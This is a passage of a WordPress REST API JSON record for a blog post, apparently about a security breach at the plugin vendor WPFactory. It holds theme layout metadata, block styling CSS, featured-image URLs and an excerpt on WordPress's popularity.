g_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451339\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/pt\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/pt\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}